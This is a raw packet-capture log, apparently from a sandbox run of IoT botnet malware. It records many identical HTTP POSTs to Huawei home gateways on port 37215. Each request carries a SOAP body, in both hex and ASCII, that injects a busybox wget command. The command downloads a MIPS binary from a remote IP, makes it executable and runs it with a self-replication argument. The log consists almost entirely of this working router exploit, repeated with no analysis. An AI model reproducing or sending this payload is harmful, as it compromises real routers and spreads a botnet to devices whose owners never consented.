                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.509433031 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    104192.168.2.1450842157.16.184.20937215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.176119089 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.515286922 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    105192.168.2.1446238197.45.163.7737215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.176573038 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.588619947 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    106192.168.2.143370083.156.17.5937215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.176573038 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.588619947 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    107192.168.2.143469890.185.86.15137215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.176573992 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.588619947 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    108192.168.2.1455706197.57.176.13537215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.177650928 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.530155897 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
